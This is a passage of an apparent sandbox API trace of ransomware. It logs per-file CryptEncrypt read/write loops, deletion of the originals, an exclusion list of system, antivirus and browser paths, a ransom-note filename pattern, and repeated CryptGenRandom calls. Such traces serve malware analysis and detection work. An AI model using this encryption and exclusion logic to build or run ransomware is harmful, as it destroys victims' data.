dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.546] GetLastError () returned 0x0 [0147.546] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.546] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.546] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.546] GetLastError () returned 0x0 [0147.546] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.546] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.546] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.546] GetLastError () returned 0x0 [0147.546] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.546] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.546] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.546] GetLastError () returned 0x0 [0147.546] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.546] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.546] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.546] GetLastError () returned 0x0 [0147.546] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.547] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0xe4, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0xe4, lpOverlapped=0x0) returned 1 [0147.547] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xe4, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xf0) returned 1 [0147.547] GetLastError () returned 0x0 [0147.547] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0xf0, lpOverlapped=0x0) returned 1 [0147.547] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0147.547] WriteFile (in: hFile=0x588, lpBuffer=0x1d421460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0147.547] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshe.xml")) returned 0x20 [0147.547] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml", dwFileAttributes=0x20) returned 0 [0147.547] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml") returned 1 [0147.547] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshe.xml")) returned 0 [0147.548] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml" [0147.548] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0147.548] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB33D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb33d.tmp")) returned 0xb33d [0147.548] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshe.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB33D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb33d.tmp"), dwFlags=0x1) returned 0 [0147.548] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB33D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb33d.tmp")) returned 1 [0147.549] CryptDestroyKey (hKey=0x9ad438) returned 1 [0147.549] wcslen (_String="OK") returned 0x2 [0147.549] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.549] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.549] CryptDestroyKey (hKey=0x9ad7b8) returned 1 [0147.549] CryptDestroyHash (hHash=0x9ad5b8) returned 1 [0147.549] CryptReleaseContext (hProv=0x8e3550, dwFlags=0x0) returned 1 [0147.549] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*NMCRYPT") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*Recovers your files.html") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*.exe") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*.dll") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*.lnk") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*.bat") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*.ini") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*.msi") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*.scf") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*pagefile.sys*") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*NTUSER.DAT*") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*AppData*") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*\\winrar\\*") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*\\java\\*") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*\\windows\\*") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*\\ESET\\*") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*\\AVG\\*") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*\\AVIRA\\*") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*Atheros*") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*Realtek*") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*bootmgr*") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*boot*") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*boot*") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*CONFIG.SYS*") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*IO.SYS*") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*MSDOS.SYS*") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*NTDETECT.COM*") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*ntldr*") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*chrome*") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*opera*") returned 0 [0147.549] PathMatchSpecW (pszFile="ipshi.xml", pszSpec="*firefox*") returned 0 [0147.549] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml", pszSpec="*") returned 1 [0147.550] strlen (_Str="NMoreira") returned 0x8 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) 